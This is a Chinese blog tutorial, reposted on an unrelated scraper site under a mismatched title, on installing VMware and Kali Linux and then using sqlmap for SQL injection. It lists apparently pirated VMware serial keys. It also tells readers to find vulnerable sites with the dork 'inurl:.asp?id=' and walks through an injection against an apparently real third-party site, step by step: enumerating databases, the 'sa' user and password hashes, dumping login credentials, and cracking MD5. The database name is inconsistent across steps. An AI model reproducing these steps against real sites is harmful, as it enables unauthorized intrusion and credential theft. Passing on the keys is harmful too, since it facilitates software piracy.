肥宅钓鱼网
当前位置: 首页 钓鱼百科

win10自带虚拟机安装kali报错(网络安全.虚拟机VMware)

时间:2023-08-04 作者: 小编 阅读量: 1 栏目名: 钓鱼百科

Sqlmap是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。通过人为猜解,知道登录表位usr。

一.虚拟机安装

1.首先需要下载VMware虚拟机,并对其进行安装。下载地址:https://www.vmware.com/cn.html

2.选择合适的版本进行下载,作者这里安装的版本为“VMware-workstation-full-12.5.2-4638234.ext”,并且上传至百度云分享给大家。

3.双击EXE文件,开始进行安装。

4.安装完成之后输入序列号激活。

5A02H-AU243-TZJ49-GTC7K-3C61N VF5XA-FNDDJ-085GZ-4NXZ9-N20E6UC5MR-8NE16-H81WY-R7QGV-QG2D8ZG1WH-ATY96-H80QP-X7PEX-Y30V4AA3E0-0VDE1-0893Z-KGZ59-QGAVF

5.运行VMware软件如下图所示,接下来需要进行第二部分的Kali配置。

二.创建虚拟机并载入Kali Linux

1.去Kali官网Downloads页面下载64位Kali Linux的torrent文件,再通过迅雷下载。下载地址:https://www.kali.org/downloads/,作者百度云网盘已上传。

2.下载成功后,新建虚拟机,选择“自定义”设置。

3.导入下载好的Kali Linux镜像文件,选择操作系统为Linux。

4.输入虚拟机的名称和安装位置。

5.设置内存分配大小,建议不要超过提示的最大内存推荐。

6.接着点击下一步,包括。

7.选择磁盘容量大小,建议比分配容量大些,并设为。

8.创建完成之后,如下图所示。

三.安装Kali Linux

1.开启虚拟机,进入安装界面,如下图所示,点击“开启此虚拟机”。

2.选择安装方式为“Graphical install”。

3.选择语言“中文简体”和地区“中国”,点击“继续”按钮安装。

4.自定义主机名,默认为“kali”,域名直接跳过即可。

5.设置用户密码,这是类似于Windows的开机密码,接着安装。

6.设置磁盘分区。

7.接着接续安装。

8.在询问是否要选择网络镜像时,如果你的网络很好可以选择是,这里我选择否。

下面这个GRUB安装至硬盘要选择“是”!

9.安装成功之后,等待系统重启即安装完成。

10.最终界面如下图所示。

Kali其他设置包括分辨率、中文输入、全屏显示等,请同学们自行百度学习。

四.Kali功能介绍

1.信息收集

2.漏洞分析

3.Web程序

4.数据库评估软件

5.密码攻击

6.无线攻击

7.逆向工程

8.漏洞利用工具集

9.嗅探/欺骗

10.权限维护

11.数字取证

12.报告工具集

13.Social Engineering Tools

打开某个软件,如下图所示。

五.SQLmap基本用法

下面作者结合Sqlmap简单讲述一个Kali环境中的实战案例。

Web漏洞包括网站本身漏洞、软件漏洞、服务器漏洞、外部攻击等,其拿站的基本方法包括通用型、SQL注入、DDoS、XXS跨站、越权漏洞、旁站注入、CSRF跨站请求、上传漏洞、支付漏洞等。

Sqlmap 是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。

Sqlmap的基本流程如下:

找注入点并检测:sqlmap –u “链接”

列库显示数据库:sqlmap –u “链接” --dbs

列表显示表:sqlmap –u “链接” –D 数据库 --tables

列字段显示表中字段: sqlmap –u “链接” –D 数据库 –T 表名 --columns

爆内容显示字段内容:sqlmap –u “链接” –D 数据库 –T 表名 –C 字段 --dump

作者本来想以“实验吧”的CTF题目作为测试地址(http://ctf5.shiyanbar.com/8/index.php?id=1),但最近它维修中,无法访问;但使用“inurl:.asp?id=”未能搜索到目标网站。希望读者后续尝试“实验吧”的那个例子,或者自行搭建本地网站环境进行SQL注入学习。

第一步:寻找目标网站,通过浏览器“inurl:.asp?id=”搜索,寻找存在SQL注入漏洞的目标,可以先尝试手工注入判断。

判断注入点的方法很多,比如show.asp?code=115’ 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。

(1) http://xxxxx/show.asp?code=115’ and 1=1 – (正常显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=1 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=1恒成立,注释(–)掉后面语句。

(2) http://xxxxx/show.asp?code=115’ and 1=2 – (错误显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=2 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=2恒错误,注释(–)掉后面语句。

但很多网站都会有防火墙,防止SQL注入,如下图所示。

第二步:打开Kali环境中的Sqlmap环境,如下图所示。(后续采用之前的文章进行讲解,也希望读者自己尝试下)

第三步:获取所有数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --dbs

运行结果如下图所示,获取9个数据库,其中–dbs参数表示databases。

第四步:获取当前数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-db

运行结果如下图所示,获取9个数据库。其中–current-db参数表示当前数据库,相当于前文MSSQL的db_name()获取数据库字段。输出结果:akykd_new。

第五步:获取数据库当前用户。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user

运行结果如下图所示,获取当前数据库用户sa。

第六步:获取数据库所有用户和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords

运行结果如下图所示,获取数据库用户和密码。

第七步:获取数据库所有表。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new --tables

运行结果如下图所示,获取数据库ahykd_new的所有表,其中-D表示数据库,–tables表示所有表。通过人为猜解,知道登录表位usr。

第八步:获取数据库登录表所有字段。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr --columns

运行结果如下图所示,获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,–columns表示usr表所有列。

是不是感觉到了SQLMAP的强大,其中用户名usr_name、密码passwd。

第九步:获取数据库登录表用户名和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name,password" --dump

获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,-C表示输出字段(usr_name、passwd),–dump输出所有值。

如果字段内容太多,可以设置输出个数,如10个用户名和密码。参数:-D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump

正常的输出结果例如下图所示,再通过md5解密即可。

六.总结

又忙了16个小时,发现自己网络安全方向的基础非常薄弱,有太多实践知识想学,太多学术论文想看,每天都在忙碌,过程非常艰辛,博士哪有这么好毕业。但是这种苦中带甜,充实的滋味又让我陶醉,还有远方的女神、许多朋友和博友的陪伴。希望未来在网络态势感知、恶意代码检测、嫌疑识别和知识图谱方面能再深入点,多读文献,多找创新,加油。

天行健,君子以自强不息。

地势坤,君子以厚德载物。

最后希望基础性文章对您有所帮助,作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。

    推荐阅读
  • 人类抓到一个入侵的半兽人(女子不幸被抓回兽人部落)

    俞初梦握住药草,异能自动告知。俞初梦将这些药草洗干净,再切成一段一段,放进竹筒里加水加热。看他对苍凤的珍惜,俞初梦想,他应该是喜欢苍凤的,但方式不对,才会引来苍凤的反感。崇蓝突然拿着一只烤好的鱼递给俞初梦。俞初梦接过烤鱼,成功化解红叶的继续追问。听到俞初梦的话,苍凤终于有点反应,褐色的眼眸冷静地看向她。苍凤咬了咬干涩的唇,豆大的眼泪不受控制地滑落。崇蓝嗓音清冷说。

  • 郭德纲岳云鹏陶阳一起的(还险被岳云鹏打)

    学戏没多久,陶阳参加了东三省“老万杯”戏曲大赛,获得优秀选手称号,这一年,他才6岁,“京剧神童”之名不胫而走。之后几年,陶阳在各项大赛出频频露脸,拿下中央台少儿“小梅花奖”第一名,还蝉联河南台“梨园春”杯全国戏迷擂台赛两次比赛的冠军。郭德纲对陶阳的爱护,不比对亲儿子郭麒麟少。陶阳年纪小,水平又突出,免不了受师兄弟羡慕嫉妒。2017年10月,麒麟剧社又重新开张,在陶阳等人努力下,渐渐走上正轨,开始盈利。

  • 重庆轨道交通27号线路线图(重庆轨道交通27号线多个站点进入全面施工)

    记者16日从中电建重庆轨道交通27号线总包部获悉,轨道交通27号线多个站点建设推进顺利。据中电建重庆轨道交通27号线总包部相关负责人介绍,截至目前,大学城南站、寨山坪站、西永站,已全面进入主体施工;虎溪站正在进行交通导改前期工程;寨山坪站土建累计完成13%;西永站土建累计完成5%;累计完成施工产值6.2亿,占总合同额的10%。

  • 宝可梦小智的实力剪辑(精灵宝可梦丹帝实锤开挂)

    上一场二打六的世界赛,是神兽男吊打小智,那一场战斗证明神兽男领先小智一个级别。丹帝能够二打六完胜卡露乃,代表他高于卡露乃一个级别。但丹帝的轰擂金刚猩也能开挂属实出乎人意料。轰擂金刚猩能够以一敌四,它的水平应该也有冠军王牌级别。卡露乃和渡两人之所以算一个水平线,是因为两人的对战不存在秒杀。

  • 长颈鹿有什么特点(长颈鹿曾经被称为是麒麟)

    经过非常长的时间进化,长颈鹿的脖子也随着它们对树叶的需求演化成今天这副模样。但事实上,长颈鹿的奔跑时速可达70千米每小时,并且,因为其身高高、视野宽、警惕性强,成年长颈鹿能够较容易得躲避敌人的追捕。直到今天,还有许多地区将长颈鹿称为麒麟或是麒麟鹿。

  • 高中数学解题的技巧(高中数学九大解题技巧)

    运用面积关系来证明或计算平面几何题的方法,称为面积方法,它是几何中的一种常用方法。反证法反证法是一种间接证法,它是先提出一个与命题的结论相反的假设,然后,从这个假设出发,经过正确的推理,导致矛盾,从而否定相反的假设,达到肯定原命题正确的一种方法。归谬是反证法的关键,导出矛盾的过程没有固定的模式,但必须从反设出发,否则推导将成为无源之水,无本之木。

  • hp电脑连不上网怎么回事(下面是原因及解决方法)

    hp电脑连不上网怎么回事如果是宽带本身的问题,首先直接联接宽带网线测试,如果是宽带的问题,联系宽带客服解决。如果是路由器的问题,如果原来可以用,暂时不能用了,断掉路由器的电源在插上,等会看看。在有就是恢复出厂设置,从新严格按说明书设置就可以用了,自己不懂,不建议自己随意设置。另外就是网卡驱动没有或不合适引起的,网线接口或网线是不是有问题等。如果是系统问题引起的,建议还原系统或重装。

  • 冰糖雪梨怎么煮黏糊(冰糖雪梨煮黏糊的做法)

    冰糖雪梨怎么煮黏糊?冰糖雪梨怎么煮黏糊将适当老冰糖放进水里,再次文火加温,可听到老冰糖在水里噼噼啪啪的响,15-30分钟时,在锅中倒进水,大约倒到锅的三分之二位置,把水烧滚;把老冰糖倒进烧开的水里,另外添加切完的梨子。40-60分钟,放进相对的服用原材料后,文火炖大约40-60分钟关火。晾至发烫就可以服用,也可以放凉了再喝,假如煮多了,还可把剩了的放进电冰箱,第2天继续食用,香甜可口。

  • 儿童鞋内长20厘米穿多少码(脚长11厘米穿多大的鞋)

    脚长11厘米穿多大的鞋成年人在选择鞋子尺码的时候,一般不会犹豫因为大家都非常清楚自己的鞋子尺码,毕竟成年人的双脚大小基本是不会发生变化的但是对于儿童来讲,双脚在不断地长大,很多宝爸宝妈都搞不清自己的孩子穿多大尺码的鞋子脚长。

  • 常规方法能否缓解甲减的痛苦(甲减难受用什么方法可以缓解)

    甲减药物的选择:药物是任何疾病必要的方法,而甲减也是如此,甲减患者在对这种疾病进行治疗时,应该正确使用药物,甲减的治疗目标就是通过口服优甲乐或雷替斯,让体内甲状腺激素水平保持在正常范围内。TSH低说明用药过量,要减少用药量。TSH高说明用量不足,要增加药量。用优甲乐或雷替斯进行替代治疗甲减效果大多十分稳定,不需要频繁抽血化验甲状腺功能指标。